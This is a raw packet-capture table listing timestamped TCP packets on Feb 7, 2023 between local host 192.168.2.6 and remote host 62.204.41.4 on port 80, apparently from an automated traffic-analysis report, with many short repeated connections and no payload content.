                          Feb 7, 2023 20:03:42.674478054 CET5033380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.735810041 CET805033362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.738182068 CET805033362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.738301039 CET5033380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.848011017 CET5033380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.848901033 CET5033480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.909872055 CET805033462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.910130024 CET5033480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.910171986 CET805033362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.910271883 CET5033380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.924732924 CET5033480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.986017942 CET805033462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.988635063 CET805033462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.988796949 CET5033480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.105947018 CET5033480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.107064962 CET5033580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.166707039 CET805033462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.166889906 CET5033480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.168657064 CET805033562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.168862104 CET5033580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.169375896 CET5033580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.230848074 CET805033562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.234117985 CET805033562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.237179995 CET5033580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.360068083 CET5033580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.360832930 CET5033680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.421240091 CET805033662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.421441078 CET805033562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.421598911 CET5033580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.421634912 CET5033680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.422466040 CET5033680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.482798100 CET805033662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.485089064 CET805033662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.485316038 CET5033680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.595221043 CET5033680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.596478939 CET5033780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.656085014 CET805033662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.657077074 CET5033680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.658428907 CET805033762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.659965038 CET5033780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.661817074 CET5033780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.724813938 CET805033762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.726258039 CET805033762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.726377010 CET5033780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.844352007 CET5033780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.845599890 CET5033880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.905917883 CET805033862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.905963898 CET805033762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.906102896 CET5033780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.906107903 CET5033880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.908584118 CET5033880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:43.968796015 CET805033862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.971452951 CET805033862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:43.972867012 CET5033880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.085722923 CET5033880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.089718103 CET5033980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.146152020 CET805033862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.146316051 CET5033880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.149980068 CET805033962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.150168896 CET5033980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.150749922 CET5033980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.211800098 CET805033962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.215348959 CET805033962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.216483116 CET5033980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.332395077 CET5033980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.333447933 CET5034080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.392905951 CET805033962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.393112898 CET5033980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.393788099 CET805034062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.393928051 CET5034080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.394521952 CET5034080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.455086946 CET805034062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.458031893 CET805034062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.458163977 CET5034080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.578542948 CET5034080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.580296040 CET5034180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.639096975 CET805034062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.639359951 CET5034080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.642210960 CET805034162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.642450094 CET5034180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.643208981 CET5034180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.703699112 CET805034162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.706828117 CET805034162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.708693981 CET5034180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.814821959 CET5034180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.816181898 CET5034280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.875597954 CET805034162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.876806021 CET5034180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.877450943 CET805034262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.882594109 CET5034280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.892172098 CET5034280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:44.953567982 CET805034262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.955727100 CET805034262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:44.957267046 CET5034280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.070033073 CET5034280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.070929050 CET5034380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.131464958 CET805034262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.132586002 CET5034280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.133228064 CET805034362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.133475065 CET5034380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.134037018 CET5034380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.196463108 CET805034362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.200069904 CET805034362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.200256109 CET5034380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.323123932 CET5034380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.324001074 CET5034480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.383693933 CET805034462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.383894920 CET5034480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.384588957 CET5034480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.385550022 CET805034362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.385629892 CET5034380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.443850040 CET805034462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.446480989 CET805034462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.446717978 CET5034480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.563036919 CET5034480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.563839912 CET5034580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.622395992 CET805034462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.622632027 CET5034480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.624257088 CET805034562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.624423981 CET5034580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.626091003 CET5034580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.686986923 CET805034562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.689590931 CET805034562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.689785004 CET5034580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.797205925 CET5034580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.798165083 CET5034680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.857846022 CET805034562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.858181953 CET5034580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.860595942 CET805034662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.860891104 CET5034680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.861769915 CET5034680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:45.924268961 CET805034662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.927083969 CET805034662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:45.927321911 CET5034680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.033761978 CET5034680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.035945892 CET5034780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.096285105 CET805034662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.096510887 CET5034680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.098584890 CET805034762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.098774910 CET5034780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.099226952 CET5034780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.161560059 CET805034762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.165688038 CET805034762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.165915012 CET5034780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.282746077 CET5034780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.283595085 CET5034880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.344083071 CET805034862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.344444990 CET5034880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.345175982 CET805034762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.345273018 CET5034780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.349889040 CET5034880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.410321951 CET805034862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.412662029 CET805034862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.412872076 CET5034880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.516949892 CET5034880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.542746067 CET5034980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.577467918 CET805034862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.577604055 CET5034880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.604219913 CET805034962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.604415894 CET5034980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.609528065 CET5034980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.671102047 CET805034962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.673799038 CET805034962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.673907042 CET5034980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.785402060 CET5034980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.786159039 CET5035080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.846961975 CET805034962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.847215891 CET5034980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.847400904 CET805035062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.847533941 CET5035080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.848979950 CET5035080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:46.910355091 CET805035062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.912657022 CET805035062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:46.912786961 CET5035080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.033976078 CET5035080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.034848928 CET5035180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.095444918 CET805035062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.095561028 CET5035080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.096383095 CET805035162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.096494913 CET5035180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.097069025 CET5035180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.158720970 CET805035162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.161994934 CET805035162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.162220001 CET5035180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.294236898 CET5035180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.295300961 CET5035280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.355911970 CET805035262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.355961084 CET805035162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.356226921 CET5035180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.357137918 CET5035280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.357137918 CET5035280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.418098927 CET805035262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.420408010 CET805035262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.420809984 CET5035280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.533350945 CET5035280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.534713984 CET5035380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.594134092 CET805035262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.595122099 CET5035280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.598632097 CET805035362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.598807096 CET5035380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.599615097 CET5035380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.662116051 CET805035362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.664232969 CET805035362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.664314032 CET5035380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.782289982 CET5035380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.783574104 CET5035480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.844867945 CET805035362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.845346928 CET805035462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.845523119 CET5035380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.845611095 CET5035480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.847893000 CET5035480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:47.909691095 CET805035462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.911897898 CET805035462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:47.912117004 CET5035480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.019876003 CET5035480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.020787001 CET5035580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.081244946 CET805035562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.081633091 CET805035462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.081886053 CET5035480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.081902981 CET5035580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.094654083 CET5035580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.155996084 CET805035562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.159996033 CET805035562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.160839081 CET5035580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.267029047 CET5035580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.268038034 CET5035680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.327666044 CET805035562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.327862024 CET5035580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.330605030 CET805035662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.330831051 CET5035680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.331429005 CET5035680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.394036055 CET805035662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.396509886 CET805035662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.396708012 CET5035680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.501043081 CET5035680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.501894951 CET5035780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.562501907 CET805035762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.562782049 CET5035780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.563249111 CET5035780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.563950062 CET805035662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.564090014 CET5035680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.623908043 CET805035762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.626431942 CET805035762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.626586914 CET5035780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.737071037 CET5035780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.738477945 CET5035880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.797744989 CET805035762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.797774076 CET805035862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.797844887 CET5035780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.797970057 CET5035880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.800827980 CET5035880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.860233068 CET805035862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.862360954 CET805035862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:48.862500906 CET5035880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.969055891 CET5035880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:48.970136881 CET5035980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.028536081 CET805035862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.028762102 CET5035880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.031349897 CET805035962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.031467915 CET5035980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.032955885 CET5035980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.094641924 CET805035962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.098532915 CET805035962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.098741055 CET5035980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.204313993 CET5035980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.206432104 CET5036080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.265721083 CET805035962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.265919924 CET5035980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.269117117 CET805036062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.269345999 CET5036080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.278758049 CET5036080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.341351032 CET805036062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.343576908 CET805036062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.343684912 CET5036080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.503448009 CET5036080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.504461050 CET5036180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.564917088 CET805036162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.565135002 CET5036180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.565589905 CET5036180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.566092968 CET805036062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.566189051 CET5036080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.626081944 CET805036162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.628758907 CET805036162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.628844976 CET5036180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.734774113 CET5036180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.735555887 CET5036280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.795201063 CET805036162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.795531034 CET5036180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.795932055 CET805036262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.796118975 CET5036280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.798074961 CET5036280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.858635902 CET805036262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.861625910 CET805036262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:49.861816883 CET5036280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.971112967 CET5036280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:49.971857071 CET5036380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.031934977 CET805036262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.032026052 CET5036280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.032187939 CET805036362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.032308102 CET5036380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.032689095 CET5036380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.093184948 CET805036362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.096600056 CET805036362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.096673012 CET5036380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.204031944 CET5036380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.204835892 CET5036480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.264719009 CET805036362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.264820099 CET5036380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.265430927 CET805036462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.265599012 CET5036480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.279050112 CET5036480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.339798927 CET805036462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.342825890 CET805036462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.343008041 CET5036480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.454521894 CET5036480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.455487013 CET5036580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.515165091 CET805036462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.515321970 CET5036480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.515949965 CET805036562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.516064882 CET5036580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.517630100 CET5036580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.578118086 CET805036562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.581003904 CET805036562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.581067085 CET5036580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.693223000 CET5036580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.694226980 CET5036680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.753987074 CET805036562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.754156113 CET5036580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.756520987 CET805036662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.756783009 CET5036680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.757392883 CET5036680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.820414066 CET805036662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.822324991 CET805036662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:50.822402954 CET5036680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.938436031 CET5036680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:50.939240932 CET5036780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.000080109 CET805036762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.000226974 CET5036780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.000812054 CET805036662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.000907898 CET5036680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.006859064 CET5036780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.067262888 CET805036762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.071639061 CET805036762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.071878910 CET5036780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.188824892 CET5036780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.189821959 CET5036880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.249316931 CET805036762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.249902010 CET5036780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.252275944 CET805036862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.252449036 CET5036880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.253026009 CET5036880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.315418005 CET805036862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.318506002 CET805036862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.321290016 CET5036880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.444303036 CET5036880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.445122004 CET5036980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.506824017 CET805036862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.507401943 CET805036962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.507611990 CET5036880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.507653952 CET5036980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.539851904 CET5036980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.602339983 CET805036962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.605659962 CET805036962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:51.609198093 CET5036980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:51.736670971 CET5036980192.168.2.662.204.41.4
